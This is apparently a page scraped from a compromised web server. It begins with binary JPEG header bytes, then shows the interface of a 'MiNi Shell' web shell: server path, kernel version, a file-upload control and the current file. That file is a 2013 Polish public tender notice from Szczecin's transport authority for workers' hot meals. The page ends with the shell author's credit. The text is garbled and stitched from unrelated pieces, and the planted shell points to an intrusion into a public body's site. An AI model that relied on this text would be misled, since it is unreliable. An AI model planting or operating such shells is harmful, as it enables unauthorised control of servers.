JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131016/215443-N-2013.html

<p class="kh_header"><b>Szczecin: Zakup posiłków regeneracyjnych dla pracowników Zespołu ds. Ochrony Środowiska</b><br>
<b>Numer ogłoszenia: 215443 - 2013; data zamieszczenia: 16.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Szczecin - Zarząd Dróg i Transportu Miejskiego , ul. Klonowica 5, 71-241 Szczecin, woj. zachodniopomorskie, tel. 91 4800444,4800434, faks 91 4393003, 4800453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zditm.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup posiłków regeneracyjnych dla pracowników Zespołu ds. Ochrony Środowiska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Przedmiotem zamówienia jest Zakup posiłków regeneracyjnych dla pracowników Zespołu ds. Ochrony Środowiska, w tym:
Część I -  Zakup posiłków regeneracyjnych dla pracowników Zespołu ds. Ochrony Środowiska na Lewobrzeżnej części Szczecina.
Część II - Zakup posiłków regeneracyjnych dla pracowników Zespołu ds. Ochrony Środowiska na Prawobrzeżnej części Szczecina.

II.	Zakres zamówienia obejmuje: 
1.	Ogólny opis przedmiotu zamówienia i wymagania dla Części I i II zamówienia:
1)	Posiłki  regeneracyjne muszą być podane  w formie jednego dania gorącego (np. zupa z wkładką, bądź drugie danie, z tym, że Zamawiający wymaga, aby co najmniej 3 razy w tygodniu posiłek był  w formie drugiego dania). 
2)	Posiłki powinny zawierać  około  50-55% węglowodanów, 30-35% tłuszczów, 15% białek oraz posiadać wartość kaloryczną co najmniej 1000 kcal.
3)	Łączna, przewidywana  ilość posiłków dziennie -  do 91 szt. (w tym do 66 szt. na Część I  i do 25 szt. na Część II zamówienia).
4)	Posiłki wydawane będą od  poniedziałku do piątku w godz. 10.00 - 12.00, w wyjątkowych sytuacjach Zamawiający zastrzega sobie prawo do wykonywania przedmiotu zamówienia w soboty i niedziele, Święta, ze zmianą godziny na późniejszą. 
5)	Posiłki muszą być wydawane na miejscu (w lokalu) lub na wynos (wówczas posiłek musi być zapakowany w opakowanie termoizolacyjne, oraz posiadać plastikowe sztućce i serwetkę).
6)	Zamawiający przewiduje dostarczanie posiłków do maksymalnie 2 miejsc dziennie na terenie Lewobrzeża, oraz do maksymalnie 1 miejsca dziennie na terenie Prawobrzeża.
7)	Wykonawca będzie świadczyć usługi zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 28 maja 1996 r. w sprawie profilaktyki posiłków dla pracowników.
8)	Posiłki będą wydawane wg harmonogramu ustalonego z Zamawiającym. Harmonogram w trakcie realizacji może być aktualizowany.
9)	Ilość posiłków będzie się zmieniać w zależności od frekwencji osób. 
10)	Zamawiający zobowiązuje się do przekazania planowanej ilości posiłków do godz. 1530 dnia poprzedzającego zamówienie.
11)	Faktyczna ilość posiłków  zostanie potwierdzona do godz. 0830 w dniu wydania posiłków, 
a także zostanie określona ilość posiłków do spożycia w punkcie gastronomicznym, oraz ilość posiłków do dostarczenia we wskazane miejsca przez Zamawiającego (Prawobrzeże lub Lewobrzeże w zależności od Części zamówienia). 
12)	Różnice w ilości posiłków między dniem poprzedzającym zamówienie, a dniem w którym posiłki będą wydawane nie przekroczą 20%.
13)	Ciepłe posiłki Wykonawca będzie dostarczać własnym transportem, w oddzielnych opakowaniach termicznych (wraz z kompletem jednorazowych sztućców, serwetką) oddzielnie zapakowanych, umożliwiających bezpośrednią konsumpcję.
14)	Jadłospis układany będzie przez Wykonawcę na okres 10 dni roboczych i dostarczany Zamawiającemu do wcześniejszego zatwierdzenia. Wszelkie zmiany w jadłospisie sugerowane przez Zamawiającego będą wiążące dla Wykonawcy. 
15)	Wykonawca zapewni na czas konsumpcji posiłku w punkcie gastronomicznym miejsce składowania narzędzi (np. łopata), którymi posługują się osoby spożywające posiłek (robotnicy).
16)	Wykonawca gwarantuje, że  usługi świadczone będą na wysokim poziomie, a mianowicie: dostarczone posiłki będą ciepłe, wykonane ze świeżych produktów, oraz  przyrządzone w dniu dostawy.
2.	Dodatkowe warunki dla Części I zamówienia:
Lewobrzeże 
Zamawiający wymaga, aby punkt gastronomiczny zlokalizowany był na terenie miasta Szczecin, na terenie RO (Rady Osiedla) Turzyn lub RO Nowe Miasto lub RO Centrum lub RO Śródmieście Północ lub RO  Śródmieście Zachód, blisko linii komunikacyjnych tj. nie dalej niż 500 m od najbliższego przystanku komunikacji miejskiej. Sala do spożywania posiłków musi umożliwić jednoczesne spożycie posiłku dla minimum  30 osób. Łączna ilość posiłków  - do 66 szt. dziennie.
3.	Dodatkowe warunki dla Części II zamówienia:
Prawobrzeże
Zamawiający wymaga, aby punkt gastronomiczny zlokalizowany był na terenie miasta Szczecin, na terenie RO (Rady Osiedla) Słoneczne lub RO Majowe, blisko linii komunikacyjnych tj. nie dalej niż 500 m od najbliższego przystanku komunikacji miejskiej, sala do spożywania posiłków musi umożliwić jednoczesne spożycie posiłku dla minimum 16 osób. Łączna ilość posiłków - do 25 szt. dziennie. 
4.Termin wykonania zamówienia dla każdej z części zamówienia: od dnia podpisania umowy, lecz nie wcześniej niż od 01.11.2013 r. do 31.03.2014 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-3, 55.50.00.00-5, 55.32.10.00-6, 55.52.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
1)	ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz;
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
Tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców, jeżeli Wykonawca nie przewiduje udziału podwykonawców należy wpisać - nie dotyczy);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4)	Oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące, że wykonawca podczas realizacji zamówienia:
a)	dysponuje punktem gastronomicznym zlokalizowanym na terenie miasta Szczecin, na terenie RO (Rady Osiedla) Turzyn lub RO Nowe Miasto lub RO Centrum lub RO Śródmieście Północ lub RO Śródmieście Zachód, blisko linii komunikacyjnych tj. nie dalej niż 500 m od najbliższego przystanku komunikacji miejskiej, z salą do spożywania posiłków umożliwiającą jednoczesne spożycie posiłku dla minimum 30 osób - dotyczy Części I zamówienia.
b)	dysponuję punktem gastronomicznym zlokalizowanym na terenie miasta Szczecin, na terenie RO (Rady Osiedla)  Słoneczne lub RO Majowe, blisko linii komunikacyjnych tj. nie dalej niż 500 m od najbliższego przystanku komunikacji miejskiej z salą do spożywania posiłków umożliwiającą jednoczesne spożycie posiłku dla minimum 16 osób - dotyczy Części II zamówienia
W przypadku składania oferty wspólnej należy złożyć jeden dokument</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Część I
Zmiana postanowień niniejszej umowy może nastąpić wyłącznie w sytuacji, gdy: 
1)	wystąpi konieczność zmiany kadry przewidzianej do realizacji umowy,
2)	wystąpi konieczność zmiany konta bankowego Wykonawcy,
3)	wystąpi konieczność zwiększenia ilości maksymalnych posiłków określonych w § 3 ust. 4, z zachowaniem ilości podanej w § 3 ust. 5 umowy,
4)	w przypadku wystąpienia okoliczności o której mowa w § 3 ust. 6, tj.  w wyjątkowych sytuacjach Zamawiający zastrzega sobie prawo do wykonywania przedmiotu umowy w soboty i niedziele, Święta, ze zmianą godziny na późniejszą. 
5)	wystąpi konieczność zmiany lokalizacji punktu gastronomicznego o którym mowa w § 3 ust. 1 niniejszej umowy, z zastrzeżeniem, iż nowo wskazany punkt gastronomiczny musi spełniać warunki określone w § 3 ust. 2  umowy.
3.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.
Część II
Zmiana postanowień niniejszej umowy może nastąpić wyłącznie w sytuacji, gdy: 
1)	wystąpi konieczność zmiany kadry przewidzianej do realizacji umowy,
2)	wystąpi konieczność zmiany konta bankowego Wykonawcy,
3)	wystąpi konieczność zwiększenia ilości maksymalnych posiłków określonych w § 3 ust. 4, z zachowaniem ilości podanej w § 3 ust. 5 umowy,
4)	w przypadku wystąpienia okoliczności o której mowa w § 3 ust. 6, tj.  w wyjątkowych sytuacjach Zamawiający zastrzega sobie prawo do wykonywania przedmiotu umowy w soboty i niedziele, Święta, ze zmianą godziny na późniejszą. 
5)	wystąpi konieczność zmiany lokalizacji punktu gastronomicznego o którym mowa w § 3 ust. 1 niniejszej umowy, z zastrzeżeniem, iż nowo wskazany punkt gastronomiczny musi spełniać warunki określone w § 3 ust. 2  umowy.
3.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zditm.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Transportu Miejskiego, ul. Klonowica 5, 71-241 Szczecin, pokój nr 318 - III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2013 godzina 08:30, miejsce: Zarząd Dróg i Transportu Miejskiego, ul. Klonowica 5, 71-241 Szczecin, Sekretariat Dyrektora - III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup posiłków regeneracyjnych dla pracowników Zespołu ds. Ochrony Środowiska na Lewobrzeżnej części Szczecina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	 Opis przedmiotu zamówienia i wymagania:
1)	Posiłki  regeneracyjne muszą być podane  w formie jednego dania gorącego (np. zupa z wkładką, bądź drugie danie, z tym, że Zamawiający wymaga, aby co najmniej 3 razy w tygodniu posiłek był  w formie drugiego dania). 
2)	Posiłki powinny zawierać  około  50-55% węglowodanów, 30-35% tłuszczów, 15% białek oraz posiadać wartość kaloryczną co najmniej 1000 kcal.
3)	Łączna, przewidywana  ilość posiłków dziennie -  do 66 szt. 
4)	Posiłki wydawane będą od  poniedziałku do piątku w godz. 1000 - 1200, w wyjątkowych sytuacjach Zamawiający zastrzega sobie prawo do wykonywania przedmiotu zamówienia w soboty i niedziele, Święta, ze zmianą godziny na późniejszą. 
5)	Posiłki muszą być wydawane na miejscu (w lokalu) lub na wynos (wówczas posiłek musi być zapakowany w opakowanie termoizolacyjne, oraz posiadać plastikowe sztućce i serwetkę).
6)	Zamawiający przewiduje dostarczanie posiłków do maksymalnie 2 miejsc dziennie na terenie Lewobrzeża.
7)	Wykonawca będzie świadczyć usługi zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 28 maja 1996 r. w sprawie profilaktyki posiłków dla pracowników.
8)	Posiłki będą wydawane wg harmonogramu ustalonego z Zamawiającym. Harmonogram w trakcie realizacji może być aktualizowany.
9)	Ilość posiłków będzie się zmieniać w zależności od frekwencji osób. 
10)	Zamawiający zobowiązuje się do przekazania planowanej ilości posiłków do godz. 1530 dnia poprzedzającego zamówienie.
11)	Faktyczna ilość posiłków  zostanie potwierdzona do godz. 0830 w dniu wydania posiłków, 
a także zostanie określona ilość posiłków do spożycia w punkcie gastronomicznym, oraz ilość posiłków do dostarczenia we wskazane miejsca przez Zamawiającego (Prawobrzeże lub Lewobrzeże w zależności od Części zamówienia). 
12)	Różnice w ilości posiłków między dniem poprzedzającym zamówienie, a dniem w którym posiłki będą wydawane nie przekroczą 20%.
13)	Ciepłe posiłki Wykonawca będzie dostarczać własnym transportem, w oddzielnych opakowaniach termicznych (wraz z kompletem jednorazowych sztućców, serwetką) oddzielnie zapakowanych, umożliwiających bezpośrednią konsumpcję.
14)	Jadłospis układany będzie przez Wykonawcę na okres 10 dni roboczych i dostarczany Zamawiającemu do wcześniejszego zatwierdzenia. Wszelkie zmiany w jadłospisie sugerowane przez Zamawiającego będą wiążące dla Wykonawcy. 
15)	Wykonawca zapewni na czas konsumpcji posiłku w punkcie gastronomicznym miejsce składowania narzędzi (np. łopata), którymi posługują się osoby spożywające posiłek (robotnicy).
16)	Wykonawca gwarantuje, że  usługi świadczone będą na wysokim poziomie, a mianowicie: dostarczone posiłki będą ciepłe, wykonane ze świeżych produktów, oraz  przyrządzone w dniu dostawy.
2.	Dodatkowe warunki dla Części I zamówienia:
Lewobrzeże 
Zamawiający wymaga, aby punkt gastronomiczny zlokalizowany był na terenie miasta Szczecin, na terenie RO (Rady Osiedla) Turzyn lub RO Nowe Miasto lub RO Centrum lub RO Śródmieście Północ lub RO  Śródmieście Zachód, blisko linii komunikacyjnych tj. nie dalej niż 500 m od najbliższego przystanku komunikacji miejskiej. Sala do spożywania posiłków musi umożliwić jednoczesne spożycie posiłku dla minimum  30 osób. Łączna ilość posiłków  - do 66 szt. dziennie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.50.00.00-5, 55.32.10.00-6, 55.52.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup posiłków regeneracyjnych dla pracowników Zespołu ds. Ochrony Środowiska na Prawobrzeżnej części Szczecina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Opis przedmiotu zamówienia i wymagania:
1)	Posiłki  regeneracyjne muszą być podane  w formie jednego dania gorącego (np. zupa z wkładką, bądź drugie danie, z tym, że Zamawiający wymaga, aby co najmniej 3 razy w tygodniu posiłek był  w formie drugiego dania). 
2)	Posiłki powinny zawierać  około  50-55% węglowodanów, 30-35% tłuszczów, 15% białek oraz posiadać wartość kaloryczną co najmniej 1000 kcal.
3)	Łączna, przewidywana  ilość posiłków dziennie -  do 25 szt. 
4)	Posiłki wydawane będą od  poniedziałku do piątku w godz. 1000 - 1200, w wyjątkowych sytuacjach Zamawiający zastrzega sobie prawo do wykonywania przedmiotu zamówienia w soboty i niedziele, Święta, ze zmianą godziny na późniejszą. 
5)	Posiłki muszą być wydawane na miejscu (w lokalu) lub na wynos (wówczas posiłek musi być zapakowany w opakowanie termoizolacyjne, oraz posiadać plastikowe sztućce i serwetkę).
6)	Zamawiający przewiduje dostarczanie posiłków do maksymalnie 1 miejsca dziennie na terenie Prawobrzeża.
7)	Wykonawca będzie świadczyć usługi zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 28 maja 1996 r. w sprawie profilaktyki posiłków dla pracowników.
8)	Posiłki będą wydawane wg harmonogramu ustalonego z Zamawiającym. Harmonogram w trakcie realizacji może być aktualizowany.
9)	Ilość posiłków będzie się zmieniać w zależności od frekwencji osób. 
10)	Zamawiający zobowiązuje się do przekazania planowanej ilości posiłków do godz. 1530 dnia poprzedzającego zamówienie.
11)	Faktyczna ilość posiłków  zostanie potwierdzona do godz. 0830 w dniu wydania posiłków, 
a także zostanie określona ilość posiłków do spożycia w punkcie gastronomicznym, oraz ilość posiłków do dostarczenia we wskazane miejsca przez Zamawiającego
12)	Różnice w ilości posiłków między dniem poprzedzającym zamówienie, a dniem w którym posiłki będą wydawane nie przekroczą 20%.
13)	Ciepłe posiłki Wykonawca będzie dostarczać własnym transportem, w oddzielnych opakowaniach termicznych (wraz z kompletem jednorazowych sztućców, serwetką) oddzielnie zapakowanych, umożliwiających bezpośrednią konsumpcję.
14)	Jadłospis układany będzie przez Wykonawcę na okres 10 dni roboczych i dostarczany Zamawiającemu do wcześniejszego zatwierdzenia. Wszelkie zmiany w jadłospisie sugerowane przez Zamawiającego będą wiążące dla Wykonawcy. 
15)	Wykonawca zapewni na czas konsumpcji posiłku w punkcie gastronomicznym miejsce składowania narzędzi (np. łopata), którymi posługują się osoby spożywające posiłek (robotnicy).
16)	Wykonawca gwarantuje, że  usługi świadczone będą na wysokim poziomie, a mianowicie: dostarczone posiłki będą ciepłe, wykonane ze świeżych produktów, oraz  przyrządzone w dniu dostawy.
2.	Dodatkowe warunki dla Części II zamówienia:
Prawobrzeże
Zamawiający wymaga, aby punkt gastronomiczny zlokalizowany był na terenie miasta Szczecin, na terenie RO (Rady Osiedla) Słoneczne lub RO Majowe, blisko linii komunikacyjnych tj. nie dalej niż 500 m od najbliższego przystanku komunikacji miejskiej, sala do spożywania posiłków musi umożliwić jednoczesne spożycie posiłku dla minimum 16 osób. Łączna ilość posiłków - do 25 szt. dziennie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.50.00.00-5, 55.32.10.00-6, 55.52.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com